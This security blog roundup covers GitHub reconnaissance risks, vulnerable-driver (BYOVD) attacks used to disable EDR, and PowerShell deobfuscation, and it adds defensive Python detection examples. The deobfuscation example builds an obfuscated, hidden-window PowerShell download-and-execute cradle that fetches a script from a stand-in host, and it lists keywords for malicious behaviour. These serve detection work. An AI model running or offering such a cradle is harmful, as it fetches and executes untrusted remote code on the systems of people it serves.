Welcome to our new blog series, in which ReliaQuest teammates recommend interesting stories that you might find useful in your day-to-day jobs. This month, I’m joined by my colleagues, threat hunters George Paco and Jonny Elrod. Here is what we are reading.
The bottom line up front: Adversaries are conducting reconnaissance on your company’s GitHub repositories, and Bellingcat’s new tool, Octosuite, will make it easier for you to find and remediate risks before the bad guys exploit them.
You are hopefully familiar with GitHub, but if you aren’t, “GitHub is a code hosting platform for version control and collaboration. It lets you and others work together on projects from anywhere.” If your company has developers, they are likely using GitHub or a competing solution like GitLab.
Many developers believe their code repositories are private when they are actually public, and sensitive data leaks as a result. Misconfigurations have led to bad actors obtaining private SSH keys, account credentials, and even AWS keys. Attackers also target developers directly so that they can take over their GitHub accounts. Many high-profile intrusions have started with bad actors gaining access to GitHub.
If you aren’t familiar with Bellingcat, they are a well-respected and world-renowned “independent international collective of researchers, investigators and citizen journalists using open source and social media investigation to probe a variety of subjects.” When an organization with the pedigree of Bellingcat puts out an OSINT tool, it is worth checking out. “Octosuite is an advanced GitHub framework written in Python that uses GitHub’s Public API to make the process of investigating accounts and repositories on the platform more efficient while also creating a set of automated and easily reproducible queries.” If you are concerned about the risks to your GitHub, and you should be, check out Octosuite.
The bottom line up front: Threat actors utilize legacy drivers to gain kernel access and disable security monitoring. Hardening against these attack vectors could save your company headache and pain.
“Hacking involves a different way of looking at problems that no one’s thought of.” – Walter O’Brien
Hacking is the repurposing of software or devices to produce different outputs than the intended use for the hacker’s benefit. After initial access, most threat actors will attempt to elevate privileges, disable security tools, and establish persistence. Many environments don’t alert on malicious use of trusted, legacy, or signed third-party drivers. Thus, threat actors can exploit these drivers, giving them access to kernel memory. This technique can be called Bring Your Own Vulnerable Driver (BYOVD)—which is basically like bringing your own keys to the bank vault.
ESET has reported APT groups like Lazarus Group utilizing a signed, legitimate Dell driver, “DBUtil_2_3.sys”, and exploiting CVE-2021-21551 to elevate privileges and gain kernel write permissions. Once they gained kernel access, Lazarus Group could disable EDR monitoring.
Sophos reported a similar attack in which BlackByte exploited the drivers “RTCore64.sys” and “RTCore32.sys” shipped within “Micro-Star’s MSI Afterburner 4.6.2.15658” via CVE-2019-16098. The report states that “a whopping list of over 1,000 drivers on which security products rely on to provide protection” can be disabled with this technique. As with Lazarus Group, the end goal was to disable security controls after gaining initial access.
Mitigating these attacks requires security teams to follow Microsoft’s recommended driver block rules. I also recommend enabling Hypervisor-Protected Code Integrity (HVCI). Windows 11 users can leverage the Windows 11 2022 update, which enables the “Microsoft Vulnerable Driver Blocklist” by default.
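An added example, not code from ESET, Sophos or ReliaQuest: simple triage logic in Python over constructed Sysmon-style driver-load records, flagging the driver file names named above even though every record carries a valid vendor signature. The record format, the small name list and the "expected directory" heuristic are my assumptions; a real deployment should key off Microsoft's vulnerable driver blocklist rather than a hand-kept set.

```python
import re

# File names of the signed-but-vulnerable drivers named in the text (Dell DBUtil,
# MSI Afterburner RTCore). Illustrative only: key a real detection off Microsoft's
# vulnerable driver blocklist rather than a hand-kept set like this one.
KNOWN_VULNERABLE = {"dbutil_2_3.sys", "rtcore64.sys", "rtcore32.sys"}

# Weak secondary signal (assumed heuristic): BYOVD tooling has to drop its driver
# somewhere before loading it, and that is rarely the system driver store. Vendor
# installers do legitimately load drivers from other locations, so expect noise.
EXPECTED_DIRS = ("c:\\windows\\system32\\drivers\\", "c:\\windows\\system32\\driverstore\\")

def parse_record(line):
    """Parse one 'key=value;key=value' record (a format constructed for this example)."""
    return dict(re.findall(r"(\w+)=([^;]*)", line))

def assess(record):
    """Verdict for one driver-load record. A valid signature never clears it: both
    drivers in the text were legitimately signed by their vendors."""
    image = record.get("ImageLoaded", "").lower()
    name = image.rsplit("\\", 1)[-1]
    reasons = []
    if name in KNOWN_VULNERABLE:
        reasons.append("known-vulnerable driver")
    if not image.startswith(EXPECTED_DIRS):
        reasons.append("loaded from unusual path")
    return {"driver": name, "signed": record.get("Signed", "").lower() == "true",
            "suspicious": bool(reasons), "reasons": reasons}

def triage(lines):
    """Assess every driver-load record in a batch of log lines."""
    return [assess(parse_record(line)) for line in lines if "ImageLoaded=" in line]

# Constructed sample records in the style of Sysmon event 6 (not real telemetry).
SAMPLE_LOG = [
    r"EventId=6;ImageLoaded=C:\Windows\System32\drivers\tcpip.sys;Signed=true;Signature=Microsoft Windows;SignatureStatus=Valid",
    r"EventId=6;ImageLoaded=C:\Users\Public\DBUtil_2_3.sys;Signed=true;Signature=Dell Inc.;SignatureStatus=Valid",
    r"EventId=6;ImageLoaded=C:\Program Files (x86)\MSI Afterburner\RTCore64.sys;Signed=true;Signature=Micro-Star International;SignatureStatus=Valid",
]

if __name__ == "__main__":
    for verdict in triage(SAMPLE_LOG):
        print(verdict)
```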
It’s always a cat-and-mouse game with adversaries. To combat the pervasive use of PowerShell obfuscation by threat actors, a group of Taiwanese researchers developed a reliable way of de-obfuscating and classifying the behavior of PowerShell code automatically through deep learning. If you’re unfamiliar with PowerShell obfuscation, it is the process of generating commands so that their intent is hidden. This obfuscation makes incident responders’ jobs much more difficult. PowerShell obfuscation comes in many forms. For some practical examples of decoding obfuscated PowerShell, see MattNotMax’s CyberChef Recipe guide on GitHub.
The authors first had to solve the problem of identification. Before performing de-obfuscation, you need to understand how a particular PowerShell command is obfuscated. PowerShell has many features that can be used for obfuscation, including string manipulation, encoding, and compression. The researchers measured the entropy of the character distribution for each obfuscation method and used it as a distinguishing metric. With an extensive training data set of obfuscated PowerShell commands, the researchers’ machine learning algorithm was able to use the character distribution measurement to make accurate predictions about the type of obfuscation in place. From there, the researchers applied the appropriate regex string replacement method to decode the PowerShell command.
With a reliable decoder, the authors set about to statically profile the expected behavior of the PowerShell command. A foolproof method of doing this is to parse the PowerShell command into an Abstract Syntax Tree (AST) which effectively breaks the PowerShell command into its base elements. The PowerShell language introduces a lot of flexibility in that the same function can be accomplished using different methods. PowerShell cmdlets can be invoked using aliases that can be shortened. Parsing a PowerShell command into its corresponding AST removes ambiguity by reducing its complexity. The researchers chose to use only a few behavior classifications: sleep, known malware, code injection, byte usage, and downloader. By feeding the ASTs of the decoded PowerShell commands into their machine-learning algorithm, the authors could reach a high level of accuracy with the profiling of PowerShell behavior.
If you’re interested in PowerShell decoding solutions but don’t have a Ph.D. in data science, don’t despair! Using a more straightforward method of decoding PowerShell commands, Palo Alto Networks researchers demonstrated that PowerShell could be decoded using simple regex matches, with no data science required. In a tool developed using Python, the Palo Alto Networks team laid out a process of recursively matching and replacing obfuscated PowerShell commands. The script then runs a keyword search on the decoded PowerShell script to look for behavioral indicators. While the programmatic approach to decoding PowerShell commands has shortcomings and won’t work in every case, it proves an adequate substitute for machine learning, especially when you don’t have a bench of data scientists.
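As an added example covering both approaches above (my own code, not the researchers' or Palo Alto Networks' tool), the Python below measures character entropy as the researchers did, strips obfuscation layers (-EncodedCommand base64, [char] codes, string concatenation, backtick escapes) by recursive regex replacement until nothing changes, and then keyword-searches the result for behavioral indicators. The behavior keyword lists, the regex set and the sample command are assumptions; the "known malware" class is omitted because it needs a name list.

```python
import base64
import math
import re

# Keyword sets for the behaviour classes the text names (minus "known malware"); the
# keywords themselves are my choice, not the researchers'.
BEHAVIOURS = {
    "downloader": ["downloadstring", "downloadfile", "invoke-webrequest", "net.webclient"],
    "code injection": ["virtualalloc", "writeprocessmemory", "createremotethread"],
    "sleep": ["start-sleep"],
    "byte usage": ["[byte[]]", "frombase64string"],
}

def shannon_entropy(text):
    """Entropy of the character distribution, the metric the researchers measured."""
    probs = (text.count(c) / len(text) for c in set(text))
    return -sum(p * math.log2(p) for p in probs)

def decode_layer(cmd):
    """Strip one obfuscation layer (-enc base64/UTF-16LE first, then text rewrites)."""
    m = re.search(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{8,})", cmd, re.I)
    if m:
        try:
            return base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            pass  # not base64 after all; fall through to the textual rewrites
    # [char]78 or [char]0x4e  ->  'N'
    cmd = re.sub(r"\[char\]\s*(0x[0-9a-f]+|\d+)",
                 lambda mm: "'" + chr(int(mm.group(1), 0)) + "'", cmd, flags=re.I)
    # 'Down'+'load'  ->  'Download'  (longer chains collapse over repeated rounds)
    cmd = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", cmd)
    # i`e`x  ->  iex  (a backtick before an ordinary letter is a no-op escape)
    return re.sub(r"`([a-z])", r"\1", cmd, flags=re.I)

def deobfuscate(cmd, max_rounds=20):
    # Match and replace recursively until a fixed point, as the Palo Alto script does.
    for _ in range(max_rounds):
        new = decode_layer(cmd)
        if new == cmd:
            break
        cmd = new
    return cmd

def classify(cmd):
    # Keyword search over the decoded text for behavioural indicators.
    low = cmd.lower()
    return sorted(b for b, kws in BEHAVIOURS.items() if any(k in low for k in kws))

# Constructed sample: char codes, concatenation and backticks, wrapped in -enc.
INNER = ("i`e`x (&([char]78+'ew-Obj'+'ect') Net.WebClient).('Down'+'load'+'String')"
         "('http://example.test/a.ps1'); Sta`rt-Sleep 3")
SAMPLE = "powershell -nop -w hidden -enc " + base64.b64encode(INNER.encode("utf-16-le")).decode()
```

Running `classify(deobfuscate(SAMPLE))` on the constructed sample yields the downloader and sleep classes once the three layers have been peeled away.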